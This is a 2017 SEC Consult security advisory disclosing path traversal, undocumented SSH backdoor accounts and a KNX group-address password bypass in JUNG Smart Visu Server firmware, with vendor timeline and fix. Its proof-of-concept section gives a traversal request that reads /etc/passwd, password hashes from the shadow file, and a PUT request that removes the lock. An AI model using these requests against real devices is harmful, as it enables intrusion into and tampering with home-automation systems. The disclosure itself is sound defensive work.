SEC Consult SA-20170207 :: Path Traversal, Backdoor accounts & KNX group address password bypass in JUNG Smart Visu server

--------------ms020007050202040103050907
Content-Type: text/plain; charset=utf-8
Content-Transfer-Encoding: quoted-printable

SEC Consult Vulnerability Lab Security Advisory < 20170207-0 >
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
              title: Path Traversal, Backdoor accounts & KNX group addres=
s
                     password bypass
            product: JUNG Smart Visu Server
 vulnerable version: Firmware v1.0.804/1.0.830/1.0.832
      fixed version: Firmware v1.0.900
         CVE number: -
             impact: Critical
           homepage: http://www.jung.de/
              found: 2016-11-10
                 by: T. Weber (Office Vienna)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Bangkok - Berlin - Linz - Luxembourg - Montreal - Mo=
scow
                     Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Z=
urich

                     https://www.sec-consult.com
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D

Vendor description:
-------------------
"JUNG provides equipment and systems that win over by advanced technology=
,
sophisticated design, and a large variety of features. On the one hand,
our portfolio includes switches, socket outlets, dimmer, and observers.
On the other, it includes innovative systems for controlling features in
your home. From lighting, blind, or temperature control to wireless and
KNX technologies, door communication, and multimedia control, a large
range of applications is covered. In addition to comfort and security,
also the requirements regarding cost-effectiveness and energy efficiency
are met."

Source:http://www.jung.de/en/1828/company/company-portrait/


Business recommendation:
------------------------
Attackers are able to gain root access through SSH with the credentials o=
f
the backdoor user account. A attacker can also unlock the group address
protection for the KNX device mapping.

JUNG has provided updated firmware which should be installed immediately.=


SEC Consult recommends not to use this product in a production environmen=
t
until a thorough security review has been performed by security professio=
nals
and all identified issues have been resolved.


Vulnerability overview/description:
-----------------------------------
1) Path Traversal Vulnerability
The Smart Visu Server runs with root privileges and is vulnerable to path=

traversal. This leads to full information disclosure of all files on the
system.

2) Backdoor Accounts
Two undocumented operating system user accounts are present on the applia=
nce.
They can be used to gain access to the Smart Visu Server via SSH.

3) Group Address (GA) unlock without Password
As protection functionality, the KNX group address can be locked with a
user-defined password. This password can be removed by using a single PUT=

request. An attacker can completely change the configuration of the conne=
cted
devices (e.g. a light switch in the kitchen can be swapped with the air
conditioner).


Proof of concept:
-----------------
1) Path Traversal Vulnerability
The Smart Visu Server is vulnerable to path traversal by sending the
following GET-Request:
------------------------------------ Request ----------------------------=
----
GET /SV-Home//..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd HTTP/1=
=2E1
Host: <IP-Address>
[...]

----------------------------------- Response ----------------------------=
----
HTTP/1.1 200 OK
Content-Disposition: inline;filename=3D"passwd"
[...]

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
[...]
-------------------------------------------------------------------------=
----

2) Backdoor Accounts
Two undocumented operating system user accounts are present on the applia=
nce.
They can be used to gain access to Smart Visu Server over SSH on Port 555=
55.

Excerpt of the shadow file:
root:$6$Zcv.yVRg$0OfnoSEEWdP4K/2z5Mm/56nfGbdAPl4ZSm3oDWqn3fMD9cXfZCov7O/s=
iheuYggHxuqHvZQ7nPSBM5BcbrH9n.:16840:0:99999:7:::
daemon:*:15914:0:99999:7:::
[...]
avahi:*:16541:0:99999:7:::
jung:$6$1SblJl3F$q6h6vfSC.IataQSqDNGw0wGvV8m/x8uLozBIj4Yj.ZzMoHbaMvzb2tR.=
B45I/ajsWpwkTcCNGjSZsLdC9IuzD.:16714:0:99999:7:::

3) Group Address (GA) unlock without Password
The following PUT request sends a JSON object to the server, which remove=
s the
password:
------------------------------------ Request ----------------------------=
----
PUT /rest/items/knxcom_datastore HTTP/1.1
Host: <IP-Address>
[...]

{"groupNames":[],"name":"knxcom_datastore","label":"knxcom_datastore","ty=
pe":"GroupItem","tags":["{"lock_ga":false}"]}
-------------------------------------------------------------------------=
----


Vulnerable / tested versions:
-----------------------------
Firmware version 1.0.804, 1.0.830 and 1.0.832 have been tested and found =
to be
vulnerable.


Vendor contact timeline:
------------------------
2016-11-21: Contacting vendor through kundencenter@jung.de, mail.vka@jung=
=2Ede
2016-12-02: Initial phone call with vendor. Advisory sent as encrypted ar=
chive.
2016-12-16: Call with vendor. Patch will be available in January 2017.
2017-01-09: Call with vendor. Patch will be approximately available in CW=
4.
            Release shifted to 2017-01-30.
2017-01-25: Call with vendor. Patch is stable in version 1.0.900 and will=
 be
            released on 2017-02-07 in CW5. Shifted release of advisory to=

            2017-02-07.
2017-02-07: Public release of advisory


Solution:
---------
Upgrade to firmware version 1.0.900 which is being provided by JUNG
through automatic updates.


Workaround:
-----------
None.


Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. I=
t
ensures the continued knowledge gain of SEC Consult in the field of netwo=
rk
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evalu=
ation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and v=
alid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/Career.htm

Interested in improving your cyber security with the experts of SEC Consu=
lt?
Contact our local offices https://www.sec-consult.com/en/About/Contact.ht=
m
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF T. Weber / @2017


--------------ms020007050202040103050907
Content-Type: application/pkcs7-signature; name="smime.p7s"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="smime.p7s"
Content-Description: S/MIME Cryptographic Signature

MIAGCSqGSIb3DQEHAqCAMIACAQExDzANBglghkgBZQMEAgEFADCABgkqhkiG9w0BBwEAAKCC
CxYwggSvMIIDl6ADAgECAhEA4CPLFRKDU4mtYW56VGdrITANBgkqhkiG9w0BAQsFADBvMQsw
CQYDVQQGEwJTRTEUMBIGA1UEChMLQWRkVHJ1c3QgQUIxJjAkBgNVBAsTHUFkZFRydXN0IEV4
dGVybmFsIFRUUCBOZXR3b3JrMSIwIAYDVQQDExlBZGRUcnVzdCBFeHRlcm5hbCBDQSBSb290
MB4XDTE0MTIyMjAwMDAwMFoXDTIwMDUzMDEwNDgzOFowgZsxCzAJBgNVBAYTAkdCMRswGQYD
VQQIExJHcmVhdGVyIE1hbmNoZXN0ZXIxEDAOBgNVBAcTB1NhbGZvcmQxGjAYBgNVBAoTEUNP
TU9ETyBDQSBMaW1pdGVkMUEwPwYDVQQDEzhDT01PRE8gU0hBLTI1NiBDbGllbnQgQXV0aGVu
dGljYXRpb24gYW5kIFNlY3VyZSBFbWFpbCBDQTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCC
AQoCggEBAImxDdp6UxlOcFIdvFamBia3uEngludRq/HwWhNJFaO0jBtgvHpRQqd5jKQi3xdh
TpHVdiMKFNNKAn+2HQmAbqUEPdm6uxb+oYepLkNSQxZ8rzJQyKZPWukI2M+TJZx7iOgwZOak
+FaA/SokFDMXmaxE5WmLo0YGS8Iz1OlAnwawsayTQLm1CJM6nCpToxDbPSBhPFUDjtlOdiUC
ISn6o3xxdk/u4V+B6ftUgNvDezVSt4TeIj0sMC0xf1m9UjewM2ktQ+v61qXxl3dnUYzZ7ifr
vKUHOHaMpKk4/9+M9QOsSb7K93OZOg8yq5yVOhM9DkY6V3RhUL7GQD/L5OKfoiECAwEAAaOC
ARcwggETMB8GA1UdIwQYMBaAFK29mHo0tCb3+sQmVO8DveAky1QaMB0GA1UdDgQWBBSSYWuC
4aKgqk/sZ/HCo/e0gADB7DAOBgNVHQ8BAf8EBAMCAYYwEgYDVR0TAQH/BAgwBgEB/wIBADAd
BgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwQwEQYDVR0gBAowCDAGBgRVHSAAMEQGA1Ud
HwQ9MDswOaA3oDWGM2h0dHA6Ly9jcmwudXNlcnRydXN0LmNvbS9BZGRUcnVzdEV4dGVybmFs
Q0FSb290LmNybDA1BggrBgEFBQcBAQQpMCcwJQYIKwYBBQUHMAGGGWh0dHA6Ly9vY3NwLnVz
ZXJ0cnVzdC5jb20wDQYJKoZIhvcNAQELBQADggEBABsqbqxVwTqriMXY7c1V86prYSvACRAj
mQ/FZmpvsfW0tXdeDwJhAN99Bf4Ss6SAgAD8+x1banICCkG8BbrBWNUmwurVTYT7/oKYz1gb
4yJjnFL4uwU2q31Ypd6rO2Pl2tVz7+zg+3vio//wQiOcyraNTT7kSxgDsqgt1Ni7QkuQaYUQ
26Y3NOh74AEQpZzKOsefT4g0bopl0BqKu6ncyso20fT8wmQpNa/WsadxEdIDQ7GPPprsnjJT
9HaSyoY0B7ksyuYcStiZDcGG4pCS+1pCaiMhEOllx/XVu37qjIUgAmLq0ToHLFnFmTPyOInl
tukWeh95FPZKEBom+nyK+5swggZfMIIFR6ADAgECAhAj5MZC/dY9qtEbiG5LTgAuMA0GCSqG
SIb3DQEBCwUAMIGbMQswCQYDVQQGEwJHQjEbMBkGA1UECBMSR3JlYXRlciBNYW5jaGVzdGVy
MRAwDgYDVQQHEwdTYWxmb3JkMRowGAYDVQQKExFDT01PRE8gQ0EgTGltaXRlZDFBMD8GA1UE
AxM4Q09NT0RPIFNIQS0yNTYgQ2xpZW50IEF1dGhlbnRpY2F0aW9uIGFuZCBTZWN1cmUgRW1h
aWwgQ0EwHhcNMTYwMzAxMDAwMDAwWhcNMTcwMzAxMjM1OTU5WjCCAVUxCzAJBgNVBAYTAkFU
MQ0wCwYDVQQREwQyNzAwMRowGAYDVQQIExFOaWVkZXJvZXN0ZXJyZWljaDEVMBMGA1UEBxMM
V3IuIE5ldXN0YWR0MRcwFQYDVQQJEw5Lb21hcmlnYXNzZSAxNDEuMCwGA1UEChMlU0VDIENv
bnN1bHQgVW50ZXJuZWhtZW5zYmVyYXR1bmcgR21iSDFJMEcGA1UECxNASXNzdWVkIHRocm91
Z2ggU0VDIENvbnN1bHQgVW50ZXJuZWhtZW5zYmVyYXR1bmcgR21iSCBFLVBLSSBNYW5hZzEf
MB0GA1UECxMWQ29ycG9yYXRlIFNlY3VyZSBFbWFpbDEmMCQGA1UEAxMdU0VDIENvbnN1bHQg
VnVsbmVyYWJpbGl0eSBMYWIxJzAlBgkqhkiG9w0BCQEWGHJlc2VhcmNoQHNlYy1jb25zdWx0
LmNvbTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAKoh5YVKjv/MHbbglWQ4TP4R
NW4uPMCX7hYsYWglGwDC4LuQ0VLYRMq1kvySSNjeNmuYD44Su8RnfAvEpFlE08GD9ZnGvb9P
KIgwJ6pdW/7N/5KhwZRspEssB2mSsXSfqZTdixTSn+XX5ay+6uZ1n2fmKOPIgYSbxColp/Ez
8l2Aq3vE1co/DZEwkbmVjL6uGk9fTpwWO/ShMIc8oYA9/KKepPvZflK5ugfs2/CJxhg9BchM
jcffaBl3Uhl17yDw2man8TbfNxj1+A3niRaEAVbU5Vq5WY0jIHA7g2/GQJAUM0zTJ4udRcIr
QuKLg7XEvbMXZq3BCZ79TcFdw3Lk/q0CAwEAAaOCAeAwggHcMB8GA1UdIwQYMBaAFJJha4Lh
oqCqT+xn8cKj97SAAMHsMB0GA1UdDgQWBBQXGcgzrRx+hb7hvKQ8IsepMrKmTzAOBgNVHQ8B
Af8EBAMCBaAwDAYDVR0TAQH/BAIwADAdBgNVHSUEFjAUBggrBgEFBQcDBAYIKwYBBQUHAwIw
RgYDVR0gBD8wPTA7BgwrBgEEAbIxAQIBAwUwKzApBggrBgEFBQcCARYdaHR0cHM6Ly9zZWN1
cmUuY29tb2RvLm5ldC9DUFMwXQYDVR0fBFYwVDBSoFCgToZMaHR0cDovL2NybC5jb21vZG9j
YS5jb20vQ09NT0RPU0hBMjU2Q2xpZW50QXV0aGVudGljYXRpb25hbmRTZWN1cmVFbWFpbENB
LmNybDCBkAYIKwYBBQUHAQEEgYMwgYAwWAYIKwYBBQUHMAKGTGh0dHA6Ly9jcnQuY29tb2Rv
Y2EuY29tL0NPTU9ET1NIQTI1NkNsaWVudEF1dGhlbnRpY2F0aW9uYW5kU2VjdXJlRW1haWxD
QS5jcnQwJAYIKwYBBQUHMAGGGGh0dHA6Ly9vY3NwLmNvbW9kb2NhLmNvbTAjBgNVHREEHDAa
gRhyZXNlYXJjaEBzZWMtY29uc3VsdC5jb20wDQYJKoZIhvcNAQELBQADggEBAFLR4ZY6goWh
4exhmTTZY0N+3pR3MbtftKS2c5NrE/UKDqK7v9Y7lbemYozkxWiB+NU/IRJKK+Ygch9LlULl
k8cZ/5chPpoH0zYvkIRoVEJ3ElScbL+5+cE2uTDfMxZnS981ptBKOA0Mln2429QlUQtOm2xy
I5B06YzAaE2hUCYnYex9xOPlo0TdL/RWL63ow9yHOor2AFF1JwkYJUYWYVWaFgJpB0sE2tmE
XUcUsPU5LNED0p9/VnKmTkcBxoQwaeZOUqMaGsLmS8zrHuz7jZrCNZt8ZcFcYOkjbW5c658w
SpM0uwsfHKMJzpHmU3amrH1PImHMYze4r64rH8t67N0xggRBMIIEPQIBATCBsDCBmzELMAkG
A1UEBhMCR0IxGzAZBgNVBAgTEkdyZWF0ZXIgTWFuY2hlc3RlcjEQMA4GA1UEBxMHU2FsZm9y
ZDEaMBgGA1UEChMRQ09NT0RPIENBIExpbWl0ZWQxQTA/BgNVBAMTOENPTU9ETyBTSEEtMjU2
IENsaWVudCBBdXRoZW50aWNhdGlvbiBhbmQgU2VjdXJlIEVtYWlsIENBAhAj5MZC/dY9qtEb
iG5LTgAuMA0GCWCGSAFlAwQCAQUAoIICYTAYBgkqhkiG9w0BCQMxCwYJKoZIhvcNAQcBMBwG
CSqGSIb3DQEJBTEPFw0xNzAyMDcxNTE0MjJaMC8GCSqGSIb3DQEJBDEiBCBWt/ekKarVotdG
C4aV2URxPyCvGW0RTpcDKKU9321VzDBsBgkqhkiG9w0BCQ8xXzBdMAsGCWCGSAFlAwQBKjAL
BglghkgBZQMEAQIwCgYIKoZIhvcNAwcwDgYIKoZIhvcNAwICAgCAMA0GCCqGSIb3DQMCAgFA
MAcGBSsOAwIHMA0GCCqGSIb3DQMCAgEoMIHBBgkrBgEEAYI3EAQxgbMwgbAwgZsxCzAJBgNV
BAYTAkdCMRswGQYDVQQIExJHcmVhdGVyIE1hbmNoZXN0ZXIxEDAOBgNVBAcTB1NhbGZvcmQx
GjAYBgNVBAoTEUNPTU9ETyBDQSBMaW1pdGVkMUEwPwYDVQQDEzhDT01PRE8gU0hBLTI1NiBD
bGllbnQgQXV0aGVudGljYXRpb24gYW5kIFNlY3VyZSBFbWFpbCBDQQIQI+TGQv3WParRG4hu
S04ALjCBwwYLKoZIhvcNAQkQAgsxgbOggbAwgZsxCzAJBgNVBAYTAkdCMRswGQYDVQQIExJH
cmVhdGVyIE1hbmNoZXN0ZXIxEDAOBgNVBAcTB1NhbGZvcmQxGjAYBgNVBAoTEUNPTU9ETyBD
QSBMaW1pdGVkMUEwPwYDVQQDEzhDT01PRE8gU0hBLTI1NiBDbGllbnQgQXV0aGVudGljYXRp
b24gYW5kIFNlY3VyZSBFbWFpbCBDQQIQI+TGQv3WParRG4huS04ALjANBgkqhkiG9w0BAQEF
AASCAQBHT0rE+MeH9fn51BcB0k4GWl0jF5RLKfMYlMSwH9nji2+M64DLWvWYpBLpjVdclAwX
YuSM9XsSnbERFPT94/KPBKUNZ6WfAitoLOO2tJkx8jiTvpUc3v6Z+ZA+cdqos01VnbJDuT8w
z8gtzyGDAQE4t55q39mJQdx/93qRPWWMMybbtBeB6a1jKZMHUDi8BLXPIHDNxnNkYhiq7g/F
Sz4cMDNhNCANWVUwrt8l46644UacdYw3zSnTFdWFb+0+FRaKdyHJ0g12C/7uK2KyJv8xvglB
Bzcu0j0X2YsDgx+Of/200K8BL9y+9nqS5aIqSmvQS/bCk3wSKkeb+kQk5wKjAAAAAAAA
--------------ms020007050202040103050907--